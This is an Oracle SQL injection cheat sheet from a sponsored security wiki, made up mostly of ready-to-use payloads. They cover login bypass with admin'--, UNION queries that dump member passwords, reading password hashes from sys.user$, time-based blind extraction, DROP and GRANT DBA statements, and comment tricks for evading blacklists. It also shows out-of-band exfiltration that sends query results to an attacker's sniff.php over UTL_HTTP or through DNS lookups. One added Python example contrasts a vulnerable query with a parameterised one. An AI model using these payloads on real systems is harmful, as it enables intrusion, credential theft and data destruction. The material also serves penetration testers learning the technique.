The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated, false-positive-free web vulnerability scanner.

Oracle SQL Injection Cheat Sheet


Version           SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
                  SELECT version FROM v$instance;
Current User      SELECT user FROM dual;
Current Database  SELECT instance_name FROM v$instance;


Error Based SQLi   For integer inputs : (utl_inaddr.get_host_address((select user from DUAL)))
                   For string inputs  : ' + (utl_inaddr.get_host_address((select user from DUAL))) + '

                   The attacks above should throw conversion errors.
Clear SQLi Tests   These tests are simply good for boolean SQL injection and silent attacks.

 product.asp?id=4
 product.asp?id=5-1
 product.asp?id=4 OR 1=1


Use this when you cannot see any difference in the output. Also, do not wait more than 30 seconds, because the database API connection timeout could easily be reached.

This works just like sleep: it waits for the specified time. It is a CPU-safe way to make the database wait.
  • select+dbms_pipe.receive_message((chr(95)||chr(96)||chr(97))+from+dual)


DROP sampletable;--
Username: admin'--

SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

This logs you in as the admin user, because the rest of the SQL query is ignored.
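As an added example (not part of the original cheat sheet), the login check above written two ways in Python against an in-memory SQLite stand-in for the members table: the concatenated query accepts the `admin'--` input with a wrong password, while the bind-variable version treats the same input as a plain string and matches nothing. The table and credentials are constructed, and SQLite uses `?` placeholders where Oracle uses `:name` bind variables.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the page's members table (SQLite, not Oracle;
    the -- comment mechanism that breaks the query is the same in both)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('admin', 's3cret'), ('bob', 'hunter2')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL text by string concatenation, so the input is parsed as SQL:
    a closing quote plus -- comments out the password check, as the page describes."""
    sql = ("SELECT username FROM members WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Uses bind variables (? in SQLite, :name in Oracle): the input is sent as a value
    and never parsed as SQL, so the string admin'-- simply matches no username."""
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "admin'--", "wrong"))  # ['admin']  (bypassed)
    print(login_safe(conn, "admin'--", "wrong"))        # []         (rejected)
    print(login_safe(conn, "admin", "s3cret"))          # ['admin']  (real login)
```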


Comments out the rest of the query when left unclosed; comments can also be used for bypassing blacklists, removing spaces, obfuscation, and determining database versions.

  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable


BEGIN
  IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
END;


SELECT CHR(75)||CHR(76)||CHR(77)

This will return 'KLM'.


With UNION you can run SQL queries across tables; basically, you can poison the query to return records from another table.

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members

This combines the results from the news table and the members table and returns all of them.

Another example:
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--


There are some techniques for command execution.

  • Creating JAVA library
  • DBMS_SCHEDULER
  • EXTPROC
  • PL/SQL native make utility (9i only)

You can also use WebRaider, which implements the first & second techniques.


CREATE USER user IDENTIFIED by pass;


DROP USER user


GRANT DBA to USER


SELECT name FROM sys.user$ where type#=1
SELECT * FROM all_users


SELECT name, password FROM sys.user$ where type#=1


SELECT DISTINCT owner FROM all_tables


  • SELECT * FROM session_privs
  • SELECT * FROM dba_role_privs
  • SELECT * FROM dba_sys_privs
  • SELECT * FROM user_tab_privs


SELECT * FROM dba_registry


SELECT * FROM all_tables where OWNER='DATABASE_NAME'


SELECT * FROM all_col_comments WHERE TABLE_NAME='TABLE'


SYSTEM
SYSAUX


SELECT name FROM V$DATAFILE

SELECT * FROM dba_directories


?vulnerableParam=(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),14) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)

{INJECTION} = the query you want to run.

If the condition is true, the response arrives after 14 seconds; if it is false, it is delayed for one second.


?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
The sniffer application will save the results.

?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ '||({INJECTION})||'.html') FROM DUAL)
The results will be saved in the HTTP access logs.

?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)
You need to sniff DNS resolution requests to yourhost.com.

?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||'.yourhost.com',80) FROM DUAL)
You need to sniff DNS resolution requests to yourhost.com.

{INJECTION} = the query you want to run.